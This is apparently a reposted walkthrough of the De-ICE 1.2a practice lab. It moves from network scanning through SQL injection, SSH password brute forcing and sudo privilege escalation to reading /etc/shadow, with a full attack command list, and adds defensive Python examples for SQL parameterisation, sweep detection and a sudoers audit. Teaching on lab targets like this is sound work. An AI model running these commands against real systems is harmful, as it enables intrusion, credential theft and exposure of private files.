Sunday, September 11, 2011

HOWTO : De-ICE.net v1.2a (1.20a) {Level 1-Disk 3-Version A}

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work, not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

The original post is here

Links

Watch video on-line
Download video

Brief Overview

De-ICE has another challenge in its "vulnerable-by-design" series - even though the naming gets more confusing with every release! It's been a while since the last release, level 2-disk 1 (back in 2007). The students of "HackingDojo" were challenged to put together their own exploitable LiveCD, and it was released under the de-ice name. This is "version A", and should not be confused with "version B" (de-ice-1.120-1.0b.iso aka Level 1-Disk 3-Release 1-Version B), as these are NOT the same challenge - it's a different setup.

Heorot.net releases (in date order):

De-ICE - Level 1 - Disk 1 (de-ice.net-1.100-1.1.iso)
De-ICE - Level 1 - Disk 2 (de-ice.net-1.110-1.0.iso)
De-ICE - Level 2 - Disk 1 (de-ice.net-2.100-1.1.iso)
pWnOS (pWnOS v1.0.zip)
Hackerdemia (hackerdemia-1.1.0.iso)
De-ICE - Level 1 - Disk 3 - Version A (de-ice-1.120-1.0a.iso)
De-ICE - Level 1 - Disk 3 - Version B (de-ice-1.120-1.0b.iso)

Method

Pre-setup (configured IP as the host has a static IP in 192.168.1.0/24 range)
Scan network for the host (nmap)
Port scanned host (unicornscan)
Enumerated services running on open ports (nmap)
Discovered a SQL Injection (Firefox)
Dumped all usernames & passwords for the database (sqlmap)
Tested for any repeated logins with known usernames & working passwords (hydra)
Escalated privileges via incorrectly configured settings (sudo)

What do I need?

de-ice-1.120-1.0a.iso (MD5: E8FB66760ADDF85896DB3F78F278F7D2)
A spare or virtual machine (Example: Virtual Box or VMware Player)
nmap – (Can be found on BackTrack 5).
unicornscan – (Can be found in BackTrack 5 repository).
sqlmap – (Can be found on BackTrack 5).
hydra – (Can be found on BackTrack 5).

Walkthrough

A quick "ping" scan with nmap shows which hosts are connected to the network. Once the target had been discovered, a detailed port scan (TCP & UDP) was run using unicornscan. To check the results, another detailed TCP port scan was done, this time using nmap. Unicornscan takes a lot less time to do a port scan than nmap (especially with UDP scanning). However, nmap has the advantage of being able to do more than just "port scanning" by also doing "information gathering". The attacker uses the "-A" option, which enables "OS detection", "version detection of services", "a collection of script scanning", and "traceroute details", and increases the scan speed with "-T4". nmap also confirms TCP port 80 is open, which is the default port for a web server, as well as detecting basic information regarding the configuration of the server.

The attacker then interacts with the web server and is presented with a "Data Entry" site. There isn't any protection on the server, which allows the attacker to add a new product into the system. Upon doing so, the attacker notices the URI of the current page, "products.php?id=1". By using the ID variable, the server selects the requested item. The attacker tries to inject their own code along with it.
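Why a numeric parameter such as "id" is injectable, and what the fix looks like, as an added example that is not part of the original post. The target is a PHP application whose source is not shown on the page, so this is a Python/sqlite3 analogue; the table, rows and function names are constructed.

```python
import sqlite3

def make_db():
    # Constructed table and rows; the real application's schema is not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?)",
                   [(1, "widget"), (2, "gadget"), (3, "gizmo")])
    return db

def lookup_concatenated(db, raw_id):
    # Vulnerable: the request value becomes part of the SQL text.
    return db.execute(
        "SELECT id, name FROM products WHERE id = " + raw_id).fetchall()

def lookup_quote_escaped(db, raw_id):
    # Still vulnerable: doubling quotes does nothing in a numeric context,
    # because the value was never inside a string literal.
    escaped = raw_id.replace("'", "''")
    return db.execute(
        "SELECT id, name FROM products WHERE id = " + escaped).fetchall()

def lookup_hardened(db, raw_id):
    # Validate the type first, then bind the value outside the SQL text.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a non-negative integer")
    return db.execute(
        "SELECT id, name FROM products WHERE id = ?", (int(raw_id),)).fetchall()

def demo():
    db = make_db()
    tampered = "1 OR 1=1"  # constructed value that rewrites the WHERE clause
    try:
        hardened = lookup_hardened(db, tampered)
    except ValueError:
        hardened = "rejected"
    return {
        "normal": lookup_hardened(db, "1"),
        "concatenated": len(lookup_concatenated(db, tampered)),
        "quote_escaped": len(lookup_quote_escaped(db, tampered)),
        "hardened": hardened,
    }
```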

The attacker uses sqlmap to speed up the injection process, as it is designed to test multiple injection methods. sqlmap has pre-built commands which allow the attacker to find common sensitive information (such as the running services and versions, the current user and the database admin, and user privileges, as well as viewing every table along with its contents). The attacker chooses to capture all the users and their passwords for the database service. The passwords used in the database are encrypted; however, they use a well-known scheme which is easily cracked. As a result, the attacker has 50 working usernames as well as 49 known passwords.

The attacker then checks to see if any of the users have reused their passwords (or if they have used someone else's known password, a blank password or their username as the password) by brute forcing the SSH remote login. The result of this action gives the attacker remote access to the system with 50 credentials.
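How this kind of password-reuse sweep looks from the server side, as an added example that is not part of the original post: a detector that flags a source address failing against many distinct accounts and lists any account it then logged in to. The log lines are constructed in OpenSSH's message format; the host name, times, PIDs, ports and the threshold are assumptions, and the whole log is treated as one time window.

```python
import re
from collections import defaultdict

# Constructed sshd log lines; only the usernames and 192.168.1.59 echo the page.
SAMPLE_LOG = """\
Sep 11 10:00:01 target sshd[2101]: Failed password for aallen from 192.168.1.59 port 40001 ssh2
Sep 11 10:00:01 target sshd[2102]: Failed password for aspears from 192.168.1.59 port 40002 ssh2
Sep 11 10:00:02 target sshd[2103]: Failed password for bbanter from 192.168.1.59 port 40003 ssh2
Sep 11 10:00:02 target sshd[2104]: Failed password for invalid user admin from 192.168.1.59 port 40004 ssh2
Sep 11 10:00:03 target sshd[2105]: Failed password for ccoffee from 192.168.1.59 port 40005 ssh2
Sep 11 10:00:04 target sshd[2106]: Accepted password for ccoffee from 192.168.1.59 port 40006 ssh2
Sep 11 10:05:10 target sshd[2110]: Failed password for jduff from 192.168.1.10 port 51000 ssh2
Sep 11 10:05:15 target sshd[2110]: Accepted password for jduff from 192.168.1.10 port 51001 ssh2
"""

LINE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect_credential_sweep(log_text, min_users=3):
    """Return {ip: {"failed_users": [...], "compromised": [...]}} for every
    source that failed against at least min_users distinct accounts."""
    failed = defaultdict(set)
    accepted = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.search(line)
        if not m:
            continue  # not a password authentication event
        bucket = failed if m["result"] == "Failed" else accepted
        bucket[m["ip"]].add(m["user"])
    report = {}
    for ip, users in failed.items():
        if len(users) >= min_users:
            # A success from a sweeping source means that account is compromised.
            report[ip] = {"failed_users": sorted(users),
                          "compromised": sorted(accepted[ip])}
    return report
```

The single mistyped password from 192.168.1.10 stays below the threshold, so the ordinary user is not reported.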

On the list of credentials, the attacker notices a few usernames which they have seen before from previous pentests for the company. The attacker then logs into their accounts and views their personal folders. Upon accessing the "ccoffee" account, there was a directory (scripts) located inside. In this folder, there was a file which was only accessible to the super user account, root. The attacker then checks to see if any privileges have been assigned to the user for this file - they have been. The attacker then backs up the file and replaces it with their own file - which is a shell prompt.

The attacker highlights the fact that the full path has to be specified for sudo to allow access to the file. After this command has been executed, the attacker now has complete access to the system. The attacker collects a bit of information about the system (IP addresses, user hashes and accesses the personal folder for the root account).
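The misconfiguration behind this step is a sudo rule that names a file inside a directory the user controls, so the file can be renamed and replaced even though its own permissions are root-only. An audit for that condition, as an added example that is not part of the original post; the function names are hypothetical, and the sample metadata (UID 1001, the modes, the /usr/local/sbin location) is constructed so the check runs offline.

```python
import os
import stat
from collections import namedtuple

Meta = namedtuple("Meta", "st_uid st_mode")  # the two lstat() fields the check reads
DIR, FILE = stat.S_IFDIR, stat.S_IFREG

# Constructed metadata modelled on the walkthrough: a root-only script inside a
# directory tree owned by the user. UID 1001, the modes and the /usr/local/sbin
# location are assumptions, not values taken from the target.
SAMPLE_FS = {
    "/": Meta(0, DIR | 0o755),
    "/home": Meta(0, DIR | 0o755),
    "/home/ccoffee": Meta(1001, DIR | 0o755),
    "/home/ccoffee/scripts": Meta(1001, DIR | 0o755),
    "/home/ccoffee/scripts/getlogs.sh": Meta(0, FILE | 0o700),
    "/usr": Meta(0, DIR | 0o755),
    "/usr/local": Meta(0, DIR | 0o755),
    "/usr/local/sbin": Meta(0, DIR | 0o755),
    "/usr/local/sbin/getlogs.sh": Meta(0, FILE | 0o700),
}

def replaceable_by_non_root(cmd_path, lstat=os.lstat):
    """Walk from the command up to "/" and return (path, reason) for every
    component that an account other than root can rewrite or rename."""
    findings = []
    path = os.path.normpath(cmd_path)
    while True:
        meta = lstat(path)
        if meta.st_uid != 0:
            findings.append((path, "owned by uid %d" % meta.st_uid))
        elif meta.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((path, "writable by group or other"))
        parent = os.path.dirname(path)
        if parent == path:  # reached the filesystem root
            break
        path = parent
    return findings[::-1]

def audit_sudo_commands(cmd_paths, lstat=os.lstat):
    """Map each command path from sudoers to its findings; an empty list
    means root controls the file and every directory above it."""
    return {p: replaceable_by_non_root(p, lstat) for p in cmd_paths}
```

On a live host, pass the command paths listed in sudoers and keep the default `lstat`; components that are symbolic links need resolving before the walk.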

As the attacker now has access to the complete system, they access every user folder at once and view random files of their choosing; a selection of them are sensitive to the company. (Note: I skipped the majority of them for two reasons: 1.) It's boring watching me cat'ing them all and 2.) It allows you to view them for yourselves).

Game over

Commands

ifconfig eth0
ifconfig eth0 192.168.1.59
ifconfig eth0
nmap 192.168.1.* -n -sn -sP
us -H -msf -Iv 192.168.1.120 -p 1-65535 && us -H -mU -Iv 192.168.1.120 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.1.120
firefox 192.168.1.120 # Add new product -> view product
cd /pentest/database/sqlmap
./sqlmap.py -u "http://192.168.1.120/products.php?id=1" -f -b --current-user --is-dba --privileges --dbs --dump
./sqlmap.py -u "http://192.168.1.120/products.php?id=1" --users --passwords
cd output/192.168.1.120/
ll
grep -i administrator log
grep -i localhost log | grep -v : | sort | uniq
grep -i localhost log | grep -v : | sort | uniq | sed "s/\[\*\] '//" | sed "s/'@'localhost'//" > /tmp/users
grep "clear-text" log | sort | uniq
grep "clear-text" log | sort | uniq | sed "s/ clear-text password: //" > /tmp/passwords
wc -l /tmp/users
hydra -L /tmp/users -P /tmp/passwords -e ns 192.168.1.120 ssh 2>/dev/null | tee /tmp/output
#medusa -h 192.168.1.120 -U /tmp/users -P /tmp/passwords -O /tmp/output -e ns -M ssh
ssh ccoffee@192.168.1.120
ls
cd scripts
ls -lah
sudo -l
cat getlogs.sh
mv getlogs.sh getlogs.bkup
echo "/bin/sh" > getlogs.sh
cat getlogs.sh
chmod +x getlogs.sh
ls -l
./getlogs.sh
id
exit
sudo getlogs.sh
sudo /home/ccoffee/scripts/getlogs.sh
id
id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lah /root/
ls -lAhR /home
#cat /home/aallen/gravy.txt
cat /home/aspears/hbkae
cat /home/bbanter/notes
cat /home/cchisholm/reminders.text
cat /home/ccoffee/DONOTFORGET
#cat /home/hlovell/creepy.doc
cat /home/jalvarez/draft
cat /home/jdavenport/company_address.txt
#cat /home/jdavenport/svrc.txt
cat /home/jduff/todo.txt
#cat /home/krenfro/list
cat /home/ktso/personnel.doc
#cat /home/kwebber/list
#cat /home/lmartinez/favorite.txt
#cat /home/mnader/layout
cat /home/rpatel/schedule


Notes

- De-ICE.net v1.2a has a static IP address of 192.168.1.120. Make sure you are on the same subnet as it!
- When booting De-ICE it will randomly assign the passwords to the usernames - so it's different each time!
- Each time you start De-ICE.net v1.2a it will generate fresh SSH keys - so it's different each time!
- I made a couple of mistakes in the video (For example: /devnull) - it's worth checking the commands subsection!

That's all! See you.